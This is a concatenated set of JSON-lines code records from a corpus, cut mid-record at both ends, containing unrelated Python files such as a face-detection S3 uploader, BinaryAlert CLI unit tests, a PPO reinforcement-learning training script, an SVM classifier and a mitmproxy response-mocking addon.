e:\n logging.error(e)\n return False\n return True\n\n\ndef upload_main():\n\n files = dict(video=[],_10KB=[],_1MB=[],_10MB=[])\n bucket_name= 'rascctvfcc104c288914011a034d2bb441de7b742257-staging'\n\n os.chdir(\"./video\")\n for file in glob.glob(\"*.mp4\"):\n files[\"_10MB\"].append(file)\n\n for key,value in files.items():\n for filename in value:\n upload_file(filename,bucket_name)\n os.chdir(\"..\")\n\n\nwhile True:\n\n check, frame = video.read()\n #frame= cv2.flip(frame,-1) # flip camera vertically\n #print(frame)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n body = haar_face_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=5, minSize=(70, 70));\n for (x, y, w, h) in body:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 3)\n DetectCount+=1\n FrameCount =0\n \n if DetectCount == 1:\n save_name = time.strftime(\"video/%Y-%m-%d-%H시%M분%S초.mp4\");\n out = cv2.VideoWriter(save_name ,fourcc, fps, (640,480),True);\n out.write(frame)\n print(save_name+' frame write start')\n DetectCount+=1\n \n elif DetectCount>=1 and FrameCount=1 and FrameCount>=recordtime:\n out.release()\n print(save_name+\"is released\")\n upload_main()\n print(\"file uploaded\")\n FrameCount=-1\n DetectCount=0\n \n\n FrameCount+=1\n # cv2.imshow(\"Face Detector\", frame)\n\n # key = cv2.waitKey(delay) \n # if key == ord('q') or key == ord('Q'):\n # print(\"종료키 입력받음 -upload file\")\n \n # upload_main()\n # break\n\n\nvideo.release()\ncv2.destroyAllWindows()\n\n\n","sub_path":"Ras_server.py","file_name":"Ras_server.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167582875","text":"num = list()\r\n\r\nmenor = maior = 0\r\nfor cont in range(0, 5):\r\n num.append(int(input('Digite um valor inteiro: ')))\r\n if cont == 0:\r\n maior = menor = num[cont]\r\n else:\r\n if num[cont] <= menor:\r\n menor = num[cont]\r\n if num[cont] >= maior:\r\n maior = num[cont]\r\n\r\nprint(f'\\nA lista que você digitou foi {num}')\r\n\r\nfor c, v in enumerate(num):\r\n if v == maior:\r\n print(f'O maior valor digitado foi {max(num)} na posição {c+1}')\r\n if v == menor:\r\n print(f'O menor valor digitado foi {min(num)} na posição {c+1}')","sub_path":"Desafio078.py","file_name":"Desafio078.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"239302049","text":"import tensorflow as tf\nfrom tensorflow.python.ops.init_ops import Initializer\nfrom tensorflow.python.util.tf_export import tf_export\n\ntf_export(\"initializers.half\")\nclass half(Initializer):\n def __init__(self, seed=None, dtype=tf.float32):\n self.seed = seed\n self.dtype = self.dtype\n\n def __call__(self, shape, dtype=None, partition_info=None):\n if dtype is None:\n dtype = self.dtype\n return 0.5*tf.ones(shape,seed=self.seed,dtype=dtype)\n\ntf_export(\"initializers.transform\")\nclass TransformInitializer(Initializer):\n def __init__(self, base_initializer, transformations, seed=None, dtype=tf.float32):\n self.transformations = transformations\n self.seed = seed\n self.dtype = dtype\n self.base_initializer = base_initializer\n\n def __call__(self, shape, dtype=None, partition_info=None):\n if dtype is None:\n dtype = self.dtype\n V = {\"tf\":tf}\n V[\"x\"] = self.base_initializer(seed=self.seed)(shape,dtype=dtype)\n for t in self.transformations:\n V[\"x\"] = eval(t,V)\n return V[\"x\"]\n","sub_path":"util/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19534707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nContains methods that will be used by many Sensor types.\nLast modified 6/20/15\n\"\"\"\nimport sys, os\nsys.path.append(os.path.dirname(__file__)[:-len(\"/Sensors\")])\nfrom constants import *\nfrom math import cos, sin, atan2\n\n# realign like in collisionCheck.py\ndef realignV(refstate, vstate):\n tempx = vstate.x - refstate.x\n tempy = vstate.y - refstate.y\n newAngle = vstate.angle - refstate.angle\n relativeDist = pow((pow(tempx,2) + pow(tempy,2)),.5)\n relativeAngle = atan2(tempy,tempx)\n rotationAngle = relativeAngle - refstate.angle\n \n realignedState = vstate.copy()\n realignedState.x = relativeDist * cos(rotationAngle)\n realignedState.y = relativeDist * sin(rotationAngle)\n realignedState.angle = newAngle\n return realignedState\n \n# returns the minimum distance of this car\n# w.r.t the front¢er of the reference car\ndef distance(refstate, vstate):\n tempx = vstate.x - refstate.x\n tempy = vstate.y - refstate.y\n # for now, be lazy and do this\n return pow( pow(tempx,2.0) + pow(tempy,2.0), .5)","sub_path":"Sensors/usefulMethods.py","file_name":"usefulMethods.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36710018","text":"\"\"\"Unit tests for the manage.py CLI script.\"\"\"\n# pylint: disable=no-self-use,protected-access\nimport base64\nimport getpass\nimport inspect\nimport os\nimport subprocess\nimport sys\nfrom unittest import mock, TestCase\n\nimport boto3\nfrom pyfakefs import fake_filesystem_unittest\n\nimport manage\n\n\ndef _mock_input(prompt: str) -> str:\n \"\"\"Mock for the user input() function to automatically respond with valid answers.\"\"\"\n # pylint: disable=too-many-return-statements\n if prompt.startswith('AWS Account'):\n return '111122223333'\n if prompt.startswith('AWS Region'):\n return 'us-west-2'\n if prompt.startswith('Unique name prefix'):\n return ' NEW_NAME_PREFIX ' # Spaces and case shouldn't matter.\n if prompt.startswith('Enable the CarbonBlack downloader'):\n return 'yes'\n if prompt.startswith('CarbonBlack URL'):\n return 'https://new-example.com'\n if prompt.startswith('Change the CarbonBlack API token'):\n return 'yes'\n if prompt.startswith('Delete all S3 objects'):\n return 'yes'\n return 'UNKNOWN'\n\n\nclass FakeFilesystemBase(fake_filesystem_unittest.TestCase):\n \"\"\"Base class sets up a fake filesystem for other test classes.\"\"\"\n\n @staticmethod\n def _write_config(\n account_id: str = '123412341234',\n region: str = 'us-test-1',\n prefix: str = 'test_prefix',\n enable_downloader: bool = True,\n cb_url: str = 'https://cb-example.com',\n encrypted_api_token: str = 'A'*100):\n \"\"\"Create terraform.tfvars file with the given configuration values.\"\"\"\n with open(manage.CONFIG_FILE, 'w') as config_file:\n config_file.write('\\n'.join([\n '// comment1',\n 'aws_account_id = \"{}\"'.format(account_id),\n 'aws_region = \"{}\" // comment2'.format(region),\n 'name_prefix = \"{}\" // comment3'.format(prefix),\n 'enable_carbon_black_downloader = {}'.format(1 if enable_downloader else 0),\n 'carbon_black_url = \"{}\" //comment4'.format(cb_url),\n 'encrypted_carbon_black_api_token = \"{}\"'.format(encrypted_api_token),\n 'force_destroy = false',\n '// comment5'\n ]))\n\n def setUp(self):\n \"\"\"Enable pyfakefs and write out Terraform config files.\"\"\"\n # pylint: disable=no-member\n self.setUpPyfakefs()\n\n # pyhcl automatically writes \"parsetab.dat\" in its site-package path.\n for path in sys.path:\n if path.endswith('site-packages'):\n self.fs.MakeDirectories(os.path.join(path, 'hcl'))\n\n # Create variables.tf file (and terraform/ directory).\n self.fs.CreateFile(\n manage.VARIABLES_FILE,\n contents='\\n'.join([\n 'variable \"aws_account_id\" {}',\n 'variable \"aws_region\" {}',\n 'variable \"name_prefix\" {}',\n 'variable \"enable_carbon_black_downloader\" {}',\n 'variable \"carbon_black_url\" {}',\n 'variable \"encrypted_carbon_black_api_token\" {}'\n ])\n )\n\n # Create terraform.tfvars file.\n self._write_config()\n\n\n@mock.patch.object(sys, 'stderr', mock.MagicMock()) # pyhcl complains about unused tokens\nclass BinaryAlertConfigTestFakeFilesystem(FakeFilesystemBase):\n \"\"\"Tests of the BinaryAlertConfig class that use a fake filesystem.\"\"\"\n\n def test_property_accesses(self):\n \"\"\"Access each property in the BinaryAlertConfig.\"\"\"\n config = manage.BinaryAlertConfig()\n\n self.assertEqual('123412341234', config.aws_account_id)\n self.assertEqual('us-test-1', config.aws_region)\n self.assertEqual('test_prefix', config.name_prefix)\n self.assertEqual(1, config.enable_carbon_black_downloader)\n self.assertEqual('https://cb-example.com', config.carbon_black_url)\n self.assertEqual('A' * 100, config.encrypted_carbon_black_api_token)\n self.assertEqual('test_prefix_binaryalert_batcher', config.binaryalert_batcher_name)\n self.assertEqual('test.prefix.binaryalert-binaries.us-test-1',\n config.binaryalert_s3_bucket_name)\n\n def test_variable_not_defined(self):\n \"\"\"InvalidConfigError is raised if a variable declaration is missing.\"\"\"\n with open(manage.CONFIG_FILE, 'w') as config_file:\n config_file.write('aws_region = \"us-east-1\"\\n')\n\n with self.assertRaises(manage.InvalidConfigError):\n manage.BinaryAlertConfig()\n\n def test_invalid_aws_account_id(self):\n \"\"\"InvalidConfigError raised if AWS account ID is not a 12-digit number\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.aws_account_id = '1234'\n\n def test_invalid_aws_region(self):\n \"\"\"InvalidConfigError raised if AWS region is set incorrectly.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.aws_region = 'us-east-1-'\n\n def test_invalid_name_prefix(self):\n \"\"\"InvalidConfigError raised if name prefix is blank.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.name_prefix = \"\"\n\n def test_invalid_enable_carbon_black_downloader(self):\n \"\"\"InvalidConfigError raised if enable_downloader is not an int.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.enable_carbon_black_downloader = '1'\n\n def test_invalid_carbon_black_url(self):\n \"\"\"InvalidConfigError raised if URL doesn't start with http(s).\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.carbon_black_url = 'example.com'\n\n def test_invalid_encrypted_carbon_black_api_token(self):\n \"\"\"InvalidConfigError raised if encrypted token is too short.\"\"\"\n config = manage.BinaryAlertConfig()\n with self.assertRaises(manage.InvalidConfigError):\n config.encrypted_carbon_black_api_token = 'ABCD'\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage.BinaryAlertConfig, '_encrypt_cb_api_token')\n def test_configure_with_defaults(\n self, mock_encrypt: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Test configure() when all variables have already had set values.\"\"\"\n config = manage.BinaryAlertConfig()\n config.configure()\n\n # Verify the mock calls.\n mock_encrypt.assert_called_once()\n mock_input.assert_has_calls([\n mock.call('AWS Region (us-test-1): '),\n mock.call('Unique name prefix, e.g. \"company_team\" (test_prefix): '),\n mock.call('Enable the CarbonBlack downloader? (yes): '),\n mock.call('CarbonBlack URL (https://cb-example.com): '),\n mock.call('Change the CarbonBlack API token? (no): ')\n ])\n\n # Verify that the configuration has changed.\n self.assertEqual('us-west-2', config.aws_region)\n self.assertEqual('new_name_prefix', config.name_prefix)\n self.assertEqual(1, config.enable_carbon_black_downloader)\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage.BinaryAlertConfig, '_encrypt_cb_api_token')\n def test_configure_with_no_defaults(\n self, mock_encrypt: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Test configure() without any values set - no defaults should print.\"\"\"\n self._write_config(\n region='', prefix='', enable_downloader=False, cb_url='', encrypted_api_token=''\n )\n config = manage.BinaryAlertConfig()\n config.configure()\n\n # Verify the mock calls.\n mock_encrypt.assert_called_once()\n mock_input.assert_has_calls([\n mock.call('AWS Region: '),\n mock.call('Unique name prefix, e.g. \"company_team\": '),\n mock.call('Enable the CarbonBlack downloader? (no): '),\n mock.call('CarbonBlack URL: '),\n ])\n\n def test_validate_valid_with_downloader(self):\n \"\"\"Test validate() with all values set correctly.\"\"\"\n config = manage.BinaryAlertConfig()\n config.validate()\n\n # None of the instance properties should have changed.\n self.test_property_accesses()\n\n def test_validate_valid_without_downloader(self):\n \"\"\"Test validate() without any CarbonBlack values set - still valid.\"\"\"\n self._write_config(enable_downloader=False, cb_url='', encrypted_api_token='')\n config = manage.BinaryAlertConfig()\n config.validate()\n\n def test_validate_invalid(self):\n \"\"\"Test validate() with an invalid configuration file.\"\"\"\n self._write_config(region='BAD_REGION')\n config = manage.BinaryAlertConfig()\n\n with self.assertRaises(manage.InvalidConfigError):\n config.validate()\n\n def test_save(self):\n \"\"\"New configuration is successfully written and comments are preserved.\"\"\"\n config = manage.BinaryAlertConfig()\n config._config['force_destroy'] = True\n config.aws_region = 'us-west-2'\n config.name_prefix = 'new_name_prefix'\n config.enable_carbon_black_downloader = 0\n config.carbon_black_url = 'https://example2.com'\n config.encrypted_carbon_black_api_token = 'B' * 100\n config.save()\n\n # Verify that all of the original comments were preserved.\n with open(manage.CONFIG_FILE) as config_file:\n raw_data = config_file.read()\n for i in range(1, 6):\n self.assertIn('comment{}'.format(i), raw_data)\n\n new_config = manage.BinaryAlertConfig()\n self.assertEqual(True, new_config._config['force_destroy'])\n self.assertEqual(config.aws_region, new_config.aws_region)\n self.assertEqual(config.name_prefix, new_config.name_prefix)\n self.assertEqual(\n config.enable_carbon_black_downloader, new_config.enable_carbon_black_downloader)\n self.assertEqual(\n config.encrypted_carbon_black_api_token, new_config.encrypted_carbon_black_api_token)\n\n\nclass BinaryAlertConfigTestRealFilesystem(TestCase):\n \"\"\"Tests of the BinaryAlertConfig class that use a real filesystem.\"\"\"\n\n @mock.patch.object(boto3, 'client')\n @mock.patch.object(getpass, 'getpass', return_value='abcd' * 10)\n @mock.patch.object(manage, 'print')\n @mock.patch.object(subprocess, 'check_call')\n def test_encrypt_cb_api_token(\n self, mock_subprocess: mock.MagicMock, mock_print: mock.MagicMock,\n mock_getpass: mock.MagicMock, mock_client: mock.MagicMock):\n \"\"\"Verify that token encryption is done correctly.\"\"\"\n mock_client('kms').encrypt.return_value = {'CiphertextBlob': base64.b64encode(b'a'*50)}\n config = manage.BinaryAlertConfig()\n config._encrypt_cb_api_token()\n\n # Verify that the mocks were called as expected.\n mock_client.assert_has_calls([\n mock.call().encrypt(KeyId=mock.ANY, Plaintext=mock_getpass.return_value)\n ])\n mock_getpass.assert_called_once()\n mock_print.assert_has_calls([\n mock.call('Terraforming KMS key...'),\n mock.call('Encrypting API token...')\n ])\n mock_subprocess.assert_has_calls([\n mock.call(['terraform', 'init']),\n mock.call(['terraform', 'apply', '-target={}'.format(manage.CB_KMS_ALIAS_TERRAFORM_ID)])\n ])\n\n\nclass ManagerTest(FakeFilesystemBase):\n \"\"\"Tests for the Manager class.\"\"\"\n\n @mock.patch('sys.stderr', mock.MagicMock()) # pyhcl complains about unused tokens to stderr.\n def setUp(self):\n super().setUp()\n self.manager = manage.Manager()\n\n def test_commands(self):\n \"\"\"Each command should be a function in the class.\"\"\"\n for command in self.manager.commands:\n self.assertTrue(hasattr(self.manager, command))\n\n def test_help(self):\n \"\"\"Help string should contain as many lines as there are commands.\"\"\"\n self.assertEqual(len(self.manager.commands), len(self.manager.help.split('\\n')))\n\n @mock.patch.object(boto3, 'client')\n @mock.patch.object(manage, 'print')\n def test_analyze_all(self, mock_print: mock.MagicMock, mock_client: mock.MagicMock):\n \"\"\"Batch analysis invocation.\"\"\"\n self.manager.analyze_all()\n mock_print.assert_has_calls([\n mock.call('Asynchronously invoking test_prefix_binaryalert_batcher...'),\n mock.call('Batcher invocation successful!')\n ])\n mock_client.assert_has_calls([\n mock.call('lambda').invoke(\n FunctionName='test_prefix_binaryalert_batcher',\n InvocationType='Event',\n Qualifier='Production'\n )\n ])\n\n @mock.patch.object(subprocess, 'check_call')\n def test_apply(self, mock_subprocess: mock.MagicMock):\n \"\"\"Validate order of Terraform operations.\"\"\"\n self.manager.apply()\n mock_subprocess.assert_has_calls([\n mock.call(['terraform', 'init']),\n mock.call(['terraform', 'fmt']),\n mock.call(['terraform', 'apply', '-auto-approve=false'])\n ])\n\n @mock.patch.object(manage, 'lambda_build')\n def test_build(self, mock_build: mock.MagicMock):\n \"\"\"Calls lambda_build function (tested elsewhere).\"\"\"\n self.manager.build()\n mock_build.assert_called_once()\n\n def test_cb_copy_all_not_enabled(self):\n \"\"\"Raises InvalidConfigError if the downloader is not enabled.\"\"\"\n self._write_config(enable_downloader=False)\n self.manager = manage.Manager() # Reload manager with the new config.\n with self.assertRaises(manage.InvalidConfigError):\n self.manager.cb_copy_all()\n\n @mock.patch.object(manage.clone_rules, 'clone_remote_rules')\n def test_clone_rules(self, mock_clone: mock.MagicMock):\n \"\"\"Calls clone_remote_rules (tested elsewhere).\"\"\"\n self.manager.clone_rules()\n mock_clone.assert_called_once()\n\n @mock.patch.object(manage.compile_rules, 'compile_rules')\n @mock.patch.object(manage, 'print')\n def test_compile_rules(self, mock_print: mock.MagicMock, mock_compile: mock.MagicMock):\n \"\"\"Calls compile_rules (tested elsewhere).\"\"\"\n self.manager.compile_rules()\n mock_compile.assert_called_once()\n mock_print.assert_called_once()\n\n @mock.patch.object(manage.BinaryAlertConfig, 'configure')\n @mock.patch.object(manage, 'print')\n def test_configure(self, mock_print: mock.MagicMock, mock_configure: mock.MagicMock):\n \"\"\"Calls BinaryAlertConfig:configure() (tested elsewhere).\"\"\"\n self.manager.configure()\n mock_configure.assert_called_once()\n mock_print.assert_called_once()\n\n @mock.patch.object(manage.Manager, 'unit_test')\n @mock.patch.object(manage.Manager, 'build')\n @mock.patch.object(manage.Manager, 'apply')\n @mock.patch.object(manage.Manager, 'analyze_all')\n def test_deploy(self, mock_analyze: mock.MagicMock, mock_apply: mock.MagicMock,\n mock_build: mock.MagicMock, mock_test: mock.MagicMock):\n \"\"\"Deploy docstring includes each executed command and runs each.\"\"\"\n for command in ['unit_test', 'build', 'apply', 'analyze_all']:\n self.assertIn(command, inspect.getdoc(manage.Manager.deploy))\n\n self.manager.deploy()\n mock_test.assert_called_once()\n mock_build.assert_called_once()\n mock_apply.assert_called_once()\n mock_analyze.assert_called_once()\n\n @mock.patch.object(manage, 'input', side_effect=_mock_input)\n @mock.patch.object(manage, 'print')\n @mock.patch.object(subprocess, 'call')\n @mock.patch.object(subprocess, 'check_call')\n def test_destroy(self, mock_check_call: mock.MagicMock, mock_call: mock.MagicMock,\n mock_print: mock.MagicMock, mock_input: mock.MagicMock):\n \"\"\"Destroy asks whether S3 objects should also be deleted.\"\"\"\n self.manager.destroy()\n mock_input.assert_called_once()\n mock_print.assert_called_once()\n mock_check_call.assert_called_once()\n mock_call.assert_called_once()\n\n @mock.patch.object(manage.live_test, 'run', return_value=False)\n def test_live_test(self, mock_live_test: mock.MagicMock):\n \"\"\"Live test wrapper raises TestFailureError if appropriate.\"\"\"\n with self.assertRaises(manage.TestFailureError):\n self.manager.live_test()\n mock_live_test.assert_called_once()\n","sub_path":"tests/manage_test.py","file_name":"manage_test.py","file_ext":"py","file_size_in_byte":16707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"343277219","text":"from rest_framework import serializers\nfrom rest_framework_bulk import BulkListSerializer\nfrom rest_framework_bulk import BulkSerializerMixin\n\nfrom api.models import Favorite\n\n\nclass ArticleSerializer(serializers.Serializer):\n content = serializers.CharField()\n heading = serializers.CharField()\n image = serializers.URLField()\n references = serializers.ListField()\n summary = serializers.CharField()\n url = serializers.URLField()\n\n\nclass FavoriteSerializer(BulkSerializerMixin, serializers.ModelSerializer):\n owner = serializers.HiddenField(\n default=serializers.CurrentUserDefault()\n )\n\n class Meta:\n model = Favorite\n fields = ('title', 'owner')\n list_serializer_class = BulkListSerializer\n","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19954008","text":"from stable_baselines3 import PPO, SAC\nfrom stable_baselines3.common.utils import set_random_seed\nfrom stable_baselines3.common.vec_env import DummyVecEnv, VecNormalize\nfrom stable_baselines3.common.vec_env.vec_frame_stack import VecFrameStack\nfrom stable_baselines3.common.callbacks import CheckpointCallback\nfrom common import wrapper_custom_align, wrapper_diff, wrapper_mut\n\nimport common.common as common\nimport common.wrapper as wrapper\nimport common.gym_interface as gym_interface\nimport common.callbacks as callbacks\nfrom common.activation_fn import MyThreshold\n\nif __name__ == \"__main__\":\n\n args = common.args\n print(args)\n\n # SAC.learn need this. If use SubprocVecEnv instead of DummyVecEnv, you need to seed in each subprocess.\n set_random_seed(common.seed)\n\n saved_model_filename = common.build_model_filename(args)\n\n hyperparams = common.load_hyperparameters(conf_name=\"PPO\")\n print(hyperparams)\n\n # Make every env has the same obs space and action space\n default_wrapper = []\n # if padding zero:\n # default_wrapper.append(wrapper.WalkerWrapper)\n \n if args.topology_wrapper == \"same\":\n body_type = 0\n for body in args.train_bodies + args.test_bodies:\n if body_type==0:\n body_type = body//100\n else:\n assert body_type == body//100, \"Training on different body types.\"\n if args.realign_method!=\"\":\n default_wrapper.append(wrapper.ReAlignedWrapper)\n elif args.topology_wrapper == \"diff\":\n default_wrapper.append(wrapper_diff.get_wrapper_class())\n elif args.topology_wrapper == \"MutantWrapper\":\n default_wrapper.append(wrapper_mut.MutantWrapper)\n elif args.topology_wrapper == \"CustomAlignWrapper\":\n default_wrapper.append(wrapper_custom_align.CustomAlignWrapper)\n else:\n pass # no need for wrapper\n\n assert len(args.train_bodies) > 0, \"No body to train.\"\n if args.with_bodyinfo:\n default_wrapper.append(wrapper.BodyinfoWrapper)\n\n print(\"Making train environments...\")\n venv = DummyVecEnv([gym_interface.make_env(rank=i, seed=common.seed, wrappers=default_wrapper, render=args.render,\n robot_body=args.train_bodies[i % len(args.train_bodies)],\n dataset_folder=args.body_folder) for i in range(args.num_venvs)])\n\n normalize_kwargs = {}\n if args.vec_normalize:\n normalize_kwargs[\"gamma\"] = hyperparams[\"gamma\"]\n venv = VecNormalize(venv, **normalize_kwargs)\n\n if args.stack_frames > 1:\n venv = VecFrameStack(venv, args.stack_frames)\n\n keys_remove = [\"normalize\", \"n_envs\", \"n_timesteps\", \"policy\"]\n for key in keys_remove:\n if key in hyperparams:\n del hyperparams[key]\n\n print(\"Making eval environments...\")\n assert args.test_bodies==args.train_bodies, \"Because we need to match alignment plan, so they must be the same.\"\n all_callbacks = []\n for rank_idx, test_body in enumerate(args.test_bodies):\n body_info = 0\n eval_venv = DummyVecEnv([gym_interface.make_env(rank=rank_idx, seed=common.seed+1, wrappers=default_wrapper, render=False,\n robot_body=test_body, body_info=body_info,\n dataset_folder=args.body_folder)])\n if args.vec_normalize:\n eval_venv = VecNormalize(eval_venv, norm_reward=False, **normalize_kwargs)\n if args.stack_frames > 1:\n eval_venv = VecFrameStack(eval_venv, args.stack_frames)\n eval_callback = callbacks.EvalCallback_with_prefix(\n eval_env=eval_venv,\n best_model_save_path=str(common.output_data_folder/\"models\"/saved_model_filename),\n prefix=f\"{test_body}\",\n n_eval_episodes=3,\n eval_freq=int(args.eval_steps/args.num_venvs), # will implicitly multiplied by (train_num_envs)\n deterministic=True,\n )\n all_callbacks.append(eval_callback)\n\n if args.with_checkpoint:\n checkpoint_callback = CheckpointCallback(save_freq=1000, save_path=str(common.output_data_folder/'checkpoints'), name_prefix=args.train_bodies)\n all_callbacks.append(checkpoint_callback)\n if args.vec_normalize:\n save_vec_callback = callbacks.SaveVecNormalizeCallback(save_freq=1000, save_path=str(\n common.output_data_folder/'checkpoints'), name_prefix=args.train_bodies)\n all_callbacks.append(save_vec_callback)\n\n if args.skip_solved_threshold>0:\n skip_solved_callback = callbacks.SkipSolvedCallback(args.skip_solved_threshold)\n all_callbacks.append(skip_solved_callback)\n\n hyperparams['policy_kwargs']['activation_fn'] = MyThreshold\n\n model = PPO('MlpPolicy', venv, verbose=1, tensorboard_log=str(common.output_data_folder/args.tensorboard/saved_model_filename), seed=common.seed, **hyperparams)\n\n if len(args.initialize_weights_from) > 0:\n try:\n load_model = PPO.load(args.initialize_weights_from)\n load_weights = load_model.policy.state_dict()\n model.policy.load_state_dict(load_weights)\n print(f\"Weights loaded from {args.initialize_weights_from}\")\n except Exception:\n print(\"Initialize weights error.\")\n raise Exception\n\n try:\n model.learn(total_timesteps=args.train_steps, callback=all_callbacks)\n except KeyboardInterrupt:\n pass\n model.save(str(common.output_data_folder/\"models\"/saved_model_filename))\n\n if args.vec_normalize:\n # Important: save the running average, for testing the agent we need that normalization\n model.get_vec_normalize_env().save(str(common.output_data_folder/\"models\"/f\"{saved_model_filename}.vnorm.pkl\"))\n\n venv.close()\n","sub_path":"project/experiments/exp_028_arms_help/src/22.0.train.py","file_name":"22.0.train.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90856808","text":"import matplotlib.pyplot as plt\n\n#from sklearn import svm\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report,accuracy_score\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.model_selection import learning_curve\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score\nimport os, os.path\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n#from tensorflow import keras\nimport itertools\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n \n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n \n from sklearn.model_selection import cross_val_score\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n plt.legend(loc=\"best\")\n plt.grid(\"on\")\n if ylim:\n plt.ylim(ylim)\n plt.title(title)\n plt.show()\n\ndef img_SVM(training_images, training_labels, test_images, test_labels):\n classifier = svm.SVC(kernel='linear', C=0.1)\n cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)\n plot_learning_curve(classifier, 'The graph of learning curve Task A1', training_images, training_labels, (0.7, 1.01), cv=cv, n_jobs=4)\n #scores = cross_val_score(classifier, training_images, training_labels, cv=5)\n #print(\"val_Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n val_acc = 0\n \n classifier.fit(training_images, training_labels)\n pred = classifier.predict(test_images)\n print(\"Accuracy:\", accuracy_score(test_labels, pred))\n acc = accuracy_score(test_labels, pred)\n print(confusion_matrix(test_labels, pred))\n print(classification_report(test_labels, pred))\n \n cnf_matrix = confusion_matrix(test_labels, pred)\n np.set_printoptions(precision=2)\n class_names= ['male','female']\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names,\n title='Confusion matrix, without normalization task A1')\n\n\n plt.show()\n\n # print(pred)\n return pred, acc, val_acc","sub_path":"AMLS_19-20_YUQIXU_SN18072225/A1/A1_SVM.py","file_name":"A1_SVM.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211463543","text":"# -*- coding:utf-8 -*-\n__author__ = 'Tnew'\n\nimport mitmproxy\nfrom mitmproxy import ctx, http\nimport json\n\nclass Counter:\n def __init__(self):\n self.num = 0\n\n def request(self, flow):\n self.num = self.num + 1\n ctx.log.info(\"We've seen %d flows\" % self.num)\n\n def response(self, flow: http.HTTPFlow):\n \"\"\"\n The full HTTP response has been read.\n \"\"\"\n if \"https://stock.xueqiu.com/v5/stock/batch/quote.json?_t\" in flow.request.pretty_url:\n with open('data_new.json', 'r', encoding='utf-8') as f:\n #json.dump() 和 json.load() 来编码和解码JSON数据,用于处理文件\n #json.dumps,json.loads对string格式进行转换,dumps是将python对象转成str,loads是将str转成python对象(dict)\n data = json.load(f) #读取文件,将f文件中的内容读取到data中,格式为dict; json.dump(data,f1)将data里面的内容写入f1文件中,写入文件,Python不判断内容的内容格式\n flow.response.text = json.dumps(data)\n\n\n\naddons = [\n 